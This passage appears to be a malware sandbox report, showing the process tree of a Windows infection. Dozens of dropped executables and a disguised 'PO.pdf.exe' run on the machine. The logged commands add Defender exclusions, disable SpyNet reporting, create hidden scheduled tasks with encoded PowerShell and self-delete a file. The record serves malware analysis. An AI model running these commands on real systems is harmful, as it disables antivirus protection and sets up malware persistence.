    - - C:\Users\Admin\Pictures\zYYIohMSxIVFKvUZbtmB65sA.exe
        
        "C:\Users\Admin\Pictures\zYYIohMSxIVFKvUZbtmB65sA.exe"
        5⤵
        
        PID:10000
    - - C:\Users\Admin\Pictures\SmkdNPYtHXDTjEclvJMbykxN.exe
        
        "C:\Users\Admin\Pictures\SmkdNPYtHXDTjEclvJMbykxN.exe"
        5⤵
        
        PID:9652
    - - C:\Users\Admin\Pictures\zyQbSdHbWvKPMfzLj3z1rXJ9.exe
        
        "C:\Users\Admin\Pictures\zyQbSdHbWvKPMfzLj3z1rXJ9.exe"
        5⤵
        
        PID:616
      - C:\Users\Admin\Pictures\zyQbSdHbWvKPMfzLj3z1rXJ9.exe
        
        "C:\Users\Admin\Pictures\zyQbSdHbWvKPMfzLj3z1rXJ9.exe"
        6⤵
        
        PID:10360
    - - C:\Users\Admin\Pictures\DcKa2LgOu4LRSAhQyFnPqPt5.exe
        
        "C:\Users\Admin\Pictures\DcKa2LgOu4LRSAhQyFnPqPt5.exe"
        5⤵
        
        PID:3416
    - - C:\Users\Admin\Pictures\wAwKvmo5GUmO5NhBKFb4hY14.exe
        
        "C:\Users\Admin\Pictures\wAwKvmo5GUmO5NhBKFb4hY14.exe"
        5⤵
        
        PID:9864
    - - C:\Users\Admin\Pictures\OciNNU1nzRVQGJ3ZBXZJ0Yue.exe
        
        "C:\Users\Admin\Pictures\OciNNU1nzRVQGJ3ZBXZJ0Yue.exe"
        5⤵
        
        PID:5496
    - - C:\Users\Admin\Pictures\LYOpA87nODasAiAXibiQGi2A.exe
        
        "C:\Users\Admin\Pictures\LYOpA87nODasAiAXibiQGi2A.exe" --silent --allusers=0
        5⤵
        
        PID:1044
      - C:\Users\Admin\Pictures\LYOpA87nODasAiAXibiQGi2A.exe
        
        C:\Users\Admin\Pictures\LYOpA87nODasAiAXibiQGi2A.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.33 --initial-client-data=0x2b8,0x2bc,0x2c0,0x294,0x2c4,0x66955648,0x66955658,0x66955664
        6⤵
        
        PID:1748
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\LYOpA87nODasAiAXibiQGi2A.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\LYOpA87nODasAiAXibiQGi2A.exe" --version
        6⤵
        
        PID:10344
    - - C:\Users\Admin\Pictures\4vFQet0rbZH59eFcy9UBzQgB.exe
        
        "C:\Users\Admin\Pictures\4vFQet0rbZH59eFcy9UBzQgB.exe"
        5⤵
        
        PID:8784
    - - C:\Users\Admin\Pictures\34b8C1OI0Zz9cYBEJ0TP0oJg.exe
        
        "C:\Users\Admin\Pictures\34b8C1OI0Zz9cYBEJ0TP0oJg.exe"
        5⤵
        
        PID:8620
- - C:\Users\Admin\AppData\Local\Temp\a\Ads.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Ads.exe"
    3⤵
    PID:5872
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      4⤵
      PID:2960
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      4⤵
      PID:2160
    - - C:\Users\Admin\Pictures\ii75wp3lrqrUb57wp06mwVhs.exe
        
        "C:\Users\Admin\Pictures\ii75wp3lrqrUb57wp06mwVhs.exe"
        5⤵
        
        PID:4544
    - - C:\Users\Admin\Pictures\5IoY3uSFLR5v95iRv6Vb3IH6.exe
        
        "C:\Users\Admin\Pictures\5IoY3uSFLR5v95iRv6Vb3IH6.exe"
        5⤵
        
        PID:3100
      - C:\Users\Admin\Pictures\5IoY3uSFLR5v95iRv6Vb3IH6.exe
        
        "C:\Users\Admin\Pictures\5IoY3uSFLR5v95iRv6Vb3IH6.exe"
        6⤵
        
        PID:2740
    - - C:\Users\Admin\Pictures\ui5MVw9uJy0BmQKfi7Z5kX15.exe
        
        "C:\Users\Admin\Pictures\ui5MVw9uJy0BmQKfi7Z5kX15.exe"
        5⤵
        
        PID:7020
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\ui5MVw9uJy0BmQKfi7Z5kX15.exe" & exit
        6⤵
        
        PID:6536
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        7⤵
        Delays execution with timeout.exe
        
        PID:7772
    - - C:\Users\Admin\Pictures\phiPorAMsjrS4WIh4Si73qeR.exe
        
        "C:\Users\Admin\Pictures\phiPorAMsjrS4WIh4Si73qeR.exe"
        5⤵
        
        PID:6064
      - C:\Users\Admin\AppData\Local\Temp\7zS256B.tmp\Install.exe
        
        .\Install.exe
        6⤵
        
        PID:7728
        
        C:\Users\Admin\AppData\Local\Temp\7zS7149.tmp\Install.exe
        
        .\Install.exe /ngmdidiCJar "385118" /S
        7⤵
        
        PID:7824
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        8⤵
        
        PID:4408
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        9⤵
        
        PID:5980
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        10⤵
        
        PID:7708
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        10⤵
        
        PID:320
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        8⤵
        
        PID:6696
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        9⤵
        
        PID:7536
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        10⤵
        
        PID:7888
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        10⤵
        
        PID:6660
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gMrEUWwqS" /SC once /ST 02:43:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        8⤵
        Creates scheduled task(s)
        
        PID:4280
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gMrEUWwqS"
        8⤵
        
        PID:7344
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gMrEUWwqS"
        8⤵
        
        PID:7624
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bNFzAqOhlEDMcZnyci" /SC once /ST 04:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\oWAkWYKplpJQgoDVT\BctMiEHyZykyFyQ\DPKYGBK.exe\" kt /zFsite_idfSO 385118 /S" /V1 /F
        8⤵
        Creates scheduled task(s)
        
        PID:3880
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "bNFzAqOhlEDMcZnyci"
        8⤵
        
        PID:9484
    - - C:\Users\Admin\Pictures\ksJx8HJJbamqBtg7pLVjVTuR.exe
        
        "C:\Users\Admin\Pictures\ksJx8HJJbamqBtg7pLVjVTuR.exe"
        5⤵
        
        PID:5544
      - C:\Users\Admin\AppData\Local\Temp\is-DAJVL.tmp\ksJx8HJJbamqBtg7pLVjVTuR.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DAJVL.tmp\ksJx8HJJbamqBtg7pLVjVTuR.tmp" /SL5="$502F6,2882374,54272,C:\Users\Admin\Pictures\ksJx8HJJbamqBtg7pLVjVTuR.exe"
        6⤵
        
        PID:7096
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /Delete /F /TN "AG1026-6"
        7⤵
        
        PID:1140
        
        C:\Program Files (x86)\TotalAudioConverter\AudioConverter.exe
        
        "C:\Program Files (x86)\TotalAudioConverter\AudioConverter.exe" -i
        7⤵
        
        PID:7640
        
        C:\Program Files (x86)\TotalAudioConverter\AudioConverter.exe
        
        "C:\Program Files (x86)\TotalAudioConverter\AudioConverter.exe" -s
        7⤵
        
        PID:6920
    - - C:\Users\Admin\Pictures\W3odCIMOrvVyHDBqsAXlHtOR.exe
        
        "C:\Users\Admin\Pictures\W3odCIMOrvVyHDBqsAXlHtOR.exe" --silent --allusers=0
        5⤵
        
        PID:6792
      - C:\Users\Admin\Pictures\W3odCIMOrvVyHDBqsAXlHtOR.exe
        
        C:\Users\Admin\Pictures\W3odCIMOrvVyHDBqsAXlHtOR.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.33 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x68775648,0x68775658,0x68775664
        6⤵
        
        PID:8168
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\W3odCIMOrvVyHDBqsAXlHtOR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\W3odCIMOrvVyHDBqsAXlHtOR.exe" --version
        6⤵
        
        PID:7752
    - - C:\Users\Admin\Pictures\G0s0A12nsOInJgfexokPPtbG.exe
        
        "C:\Users\Admin\Pictures\G0s0A12nsOInJgfexokPPtbG.exe"
        5⤵
        
        PID:3108
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:10084
    - - C:\Users\Admin\Pictures\1caqVmn6meQYlHOL1mgHgE2W.exe
        
        "C:\Users\Admin\Pictures\1caqVmn6meQYlHOL1mgHgE2W.exe"
        5⤵
        
        PID:6596
    - - C:\Users\Admin\Pictures\f0WZFu4yTHfCRZaqDdD4ivwf.exe
        
        "C:\Users\Admin\Pictures\f0WZFu4yTHfCRZaqDdD4ivwf.exe"
        5⤵
        
        PID:7408
    - - C:\Users\Admin\Pictures\9eReB9IWDxk2jjzNUuPAexls.exe
        
        "C:\Users\Admin\Pictures\9eReB9IWDxk2jjzNUuPAexls.exe"
        5⤵
        
        PID:2324
      - C:\Users\Admin\AppData\Local\Temp\is-R9DTL.tmp\9eReB9IWDxk2jjzNUuPAexls.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-R9DTL.tmp\9eReB9IWDxk2jjzNUuPAexls.tmp" /SL5="$603D8,2882374,54272,C:\Users\Admin\Pictures\9eReB9IWDxk2jjzNUuPAexls.exe"
        6⤵
        
        PID:1400
    - - C:\Users\Admin\Pictures\M4RyPWZGXCCzpzxWbgmPHths.exe
        
        "C:\Users\Admin\Pictures\M4RyPWZGXCCzpzxWbgmPHths.exe"
        5⤵
        
        PID:4196
      - C:\Users\Admin\AppData\Local\Temp\7zS6D1F.tmp\Install.exe
        
        .\Install.exe
        6⤵
        
        PID:3576
        
        C:\Users\Admin\AppData\Local\Temp\7zS8B75.tmp\Install.exe
        
        .\Install.exe /gwBdidRwz "385118" /S
        7⤵
        
        PID:7156
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        8⤵
        
        PID:7480
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        9⤵
        
        PID:5184
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        10⤵
        
        PID:6664
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        10⤵
        
        PID:9712
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        8⤵
        
        PID:6256
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        9⤵
        
        PID:5880
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        10⤵
        
        PID:10068
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        10⤵
        
        PID:9748
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gwSTQTLKz" /SC once /ST 03:30:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        8⤵
        Creates scheduled task(s)
        
        PID:8768
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gwSTQTLKz"
        8⤵
        
        PID:8736
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gwSTQTLKz"
        8⤵
        
        PID:7608
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bNFzAqOhlEDMcZnyci" /SC once /ST 04:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\oWAkWYKplpJQgoDVT\BctMiEHyZykyFyQ\GYJPUhT.exe\" kt /jfsite_idMox 385118 /S" /V1 /F
        8⤵
        Creates scheduled task(s)
        
        PID:9712
    - - C:\Users\Admin\Pictures\eWDpHVuZQOz4y2dUsSiK9Rft.exe
        
        "C:\Users\Admin\Pictures\eWDpHVuZQOz4y2dUsSiK9Rft.exe"
        5⤵
        
        PID:3868
    - - C:\Users\Admin\Pictures\Rn8rOfKF9KUEmsAaVDO5SDpV.exe
        
        "C:\Users\Admin\Pictures\Rn8rOfKF9KUEmsAaVDO5SDpV.exe" --silent --allusers=0
        5⤵
        
        PID:3716
      - C:\Users\Admin\Pictures\Rn8rOfKF9KUEmsAaVDO5SDpV.exe
        
        C:\Users\Admin\Pictures\Rn8rOfKF9KUEmsAaVDO5SDpV.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.33 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x65e25648,0x65e25658,0x65e25664
        6⤵
        
        PID:7552
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Rn8rOfKF9KUEmsAaVDO5SDpV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Rn8rOfKF9KUEmsAaVDO5SDpV.exe" --version
        6⤵
        
        PID:5352
    - - C:\Users\Admin\Pictures\W4QvkQ3WsoYWx5uX2UzwLkaH.exe
        
        "C:\Users\Admin\Pictures\W4QvkQ3WsoYWx5uX2UzwLkaH.exe"
        5⤵
        
        PID:5212
      - C:\Users\Admin\Pictures\W4QvkQ3WsoYWx5uX2UzwLkaH.exe
        
        "C:\Users\Admin\Pictures\W4QvkQ3WsoYWx5uX2UzwLkaH.exe"
        6⤵
        
        PID:6884
    - - C:\Users\Admin\Pictures\LCz0xY9RV3gEFCwMARbZ4ZPv.exe
        
        "C:\Users\Admin\Pictures\LCz0xY9RV3gEFCwMARbZ4ZPv.exe"
        5⤵
        
        PID:4020
    - - C:\Users\Admin\Pictures\iIUcuelYv80AmaIeFNmlfwup.exe
        
        "C:\Users\Admin\Pictures\iIUcuelYv80AmaIeFNmlfwup.exe"
        5⤵
        
        PID:9820
      - C:\Users\Admin\AppData\Local\Temp\is-CS3PK.tmp\iIUcuelYv80AmaIeFNmlfwup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-CS3PK.tmp\iIUcuelYv80AmaIeFNmlfwup.tmp" /SL5="$1067A,2882374,54272,C:\Users\Admin\Pictures\iIUcuelYv80AmaIeFNmlfwup.exe"
        6⤵
        
        PID:9776
    - - C:\Users\Admin\Pictures\bdvcSXHdBc5HVvP4ojtoTEzd.exe
        
        "C:\Users\Admin\Pictures\bdvcSXHdBc5HVvP4ojtoTEzd.exe"
        5⤵
        
        PID:10432
    - - C:\Users\Admin\Pictures\GYslwRPWCRzMgilexZI6QKJ9.exe
        
        "C:\Users\Admin\Pictures\GYslwRPWCRzMgilexZI6QKJ9.exe"
        5⤵
        
        PID:10548
    - - C:\Users\Admin\Pictures\KTxKVZWLOi5LsECAZHmnKdjk.exe
        
        "C:\Users\Admin\Pictures\KTxKVZWLOi5LsECAZHmnKdjk.exe"
        5⤵
        
        PID:10444
    - - C:\Users\Admin\Pictures\0dJzWgJTZaKTwGeOKPMRzJpK.exe
        
        "C:\Users\Admin\Pictures\0dJzWgJTZaKTwGeOKPMRzJpK.exe"
        5⤵
        
        PID:10388
      - C:\Users\Admin\Pictures\0dJzWgJTZaKTwGeOKPMRzJpK.exe
        
        "C:\Users\Admin\Pictures\0dJzWgJTZaKTwGeOKPMRzJpK.exe"
        6⤵
        
        PID:10800
    - - C:\Users\Admin\Pictures\fsncWAR5YeMxpkX5sQ1gFUd7.exe
        
        "C:\Users\Admin\Pictures\fsncWAR5YeMxpkX5sQ1gFUd7.exe"
        5⤵
        
        PID:10000
    - - C:\Users\Admin\Pictures\eq9IWW4FAK8HjgbWjGt3GtnD.exe
        
        "C:\Users\Admin\Pictures\eq9IWW4FAK8HjgbWjGt3GtnD.exe"
        5⤵
        
        PID:11012
      - C:\Users\Admin\AppData\Local\Temp\7zS72E4.tmp\Install.exe
        
        .\Install.exe
        6⤵
        
        PID:348
    - - C:\Users\Admin\Pictures\UzP4hyLVVbXzjtIZSsuQXvUT.exe
        
        "C:\Users\Admin\Pictures\UzP4hyLVVbXzjtIZSsuQXvUT.exe" --silent --allusers=0
        5⤵
        
        PID:10260
      - C:\Users\Admin\Pictures\UzP4hyLVVbXzjtIZSsuQXvUT.exe
        
        C:\Users\Admin\Pictures\UzP4hyLVVbXzjtIZSsuQXvUT.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=104.0.4944.33 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x65ff5648,0x65ff5658,0x65ff5664
        6⤵
        
        PID:10712
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\UzP4hyLVVbXzjtIZSsuQXvUT.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\UzP4hyLVVbXzjtIZSsuQXvUT.exe" --version
        6⤵
        
        PID:10952
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      4⤵
      PID:5452
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      4⤵
      PID:5612
- - C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe
    "C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe"
    3⤵
    PID:4156
- - C:\Users\Admin\AppData\Local\Temp\a\Qconngovaq.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Qconngovaq.exe"
    3⤵
    PID:3088
  - - C:\Users\Admin\AppData\Local\Temp\a\Qconngovaq.exe
      C:\Users\Admin\AppData\Local\Temp\a\Qconngovaq.exe
      4⤵
      PID:2804
- - C:\Users\Admin\AppData\Local\Temp\a\PO.pdf.exe
    "C:\Users\Admin\AppData\Local\Temp\a\PO.pdf.exe"
    3⤵
    PID:4928
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\PO.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PO.exe"
      4⤵
      PID:6524
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\PO.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PO.exe"
        5⤵
        
        PID:5248
- - C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe"
    3⤵
    PID:5996
  - - C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe"
      4⤵
      PID:2932
- - C:\Users\Admin\AppData\Local\Temp\a\DH.exe
    "C:\Users\Admin\AppData\Local\Temp\a\DH.exe"
    3⤵
    PID:5636
  - - C:\Users\Admin\AppData\Local\Temp\a\DH.exe
      "C:\Users\Admin\AppData\Local\Temp\a\DH.exe"
      4⤵
      PID:3348
- - C:\Users\Admin\AppData\Local\Temp\a\raaa.exe
    "C:\Users\Admin\AppData\Local\Temp\a\raaa.exe"
    3⤵
    PID:3576
  - - C:\Users\Admin\AppData\Local\Temp\a\raaa.exe
      "C:\Users\Admin\AppData\Local\Temp\a\raaa.exe"
      4⤵
      PID:7220
- - C:\Users\Admin\AppData\Local\Temp\a\aao.exe
    "C:\Users\Admin\AppData\Local\Temp\a\aao.exe"
    3⤵
    PID:5432
  - - C:\Users\Admin\AppData\Local\Temp\a\aao.exe
      "C:\Users\Admin\AppData\Local\Temp\a\aao.exe"
      4⤵
      PID:7916
- - C:\Users\Admin\AppData\Local\Temp\a\owenzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\owenzx.exe"
    3⤵
    PID:1324
  - - C:\Users\Admin\AppData\Local\Temp\a\owenzx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\owenzx.exe"
      4⤵
      PID:2036
- - C:\Users\Admin\AppData\Local\Temp\a\ghostzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ghostzx.exe"
    3⤵
    PID:6244
  - - C:\Users\Admin\AppData\Local\Temp\a\ghostzx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\ghostzx.exe"
      4⤵
      PID:1064
  - - C:\Users\Admin\AppData\Local\Temp\a\ghostzx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\ghostzx.exe"
      4⤵
      PID:5264
- - C:\Users\Admin\AppData\Local\Temp\a\isbinzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\isbinzx.exe"
    3⤵
    PID:6400
  - - C:\Users\Admin\AppData\Local\Temp\a\isbinzx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\isbinzx.exe"
      4⤵
      PID:7292
- - C:\Users\Admin\AppData\Local\Temp\a\newrock.exe
    "C:\Users\Admin\AppData\Local\Temp\a\newrock.exe"
    3⤵
    PID:6588
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      PID:2504
    - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
        5⤵
        
        PID:6848
  - - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
      "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
      4⤵
      PID:6072
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4160
- - C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe"
    3⤵
    PID:6844
  - - C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\pablozx.exe"
      4⤵
      PID:8104
- - C:\Users\Admin\AppData\Local\Temp\a\humblezx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\humblezx.exe"
    3⤵
    PID:5288
  - - C:\Users\Admin\AppData\Local\Temp\a\humblezx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\humblezx.exe"
      4⤵
      PID:8148
  - - C:\Users\Admin\AppData\Local\Temp\a\humblezx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\humblezx.exe"
      4⤵
      PID:3664
- - C:\Users\Admin\AppData\Local\Temp\a\source2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\source2.exe"
    3⤵
    PID:6652
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:6804
- - C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe
    "C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe"
    3⤵
    PID:1428
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\IgNIppWS.exe"
      4⤵
      PID:6968
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IgNIppWS" /XML "C:\Users\Admin\AppData\Local\Temp\tmpC12A.tmp"
      4⤵
      Creates scheduled task(s)
      PID:3988
  - - C:\Users\Admin\AppData\Local\Temp\a\audiodgse.exe
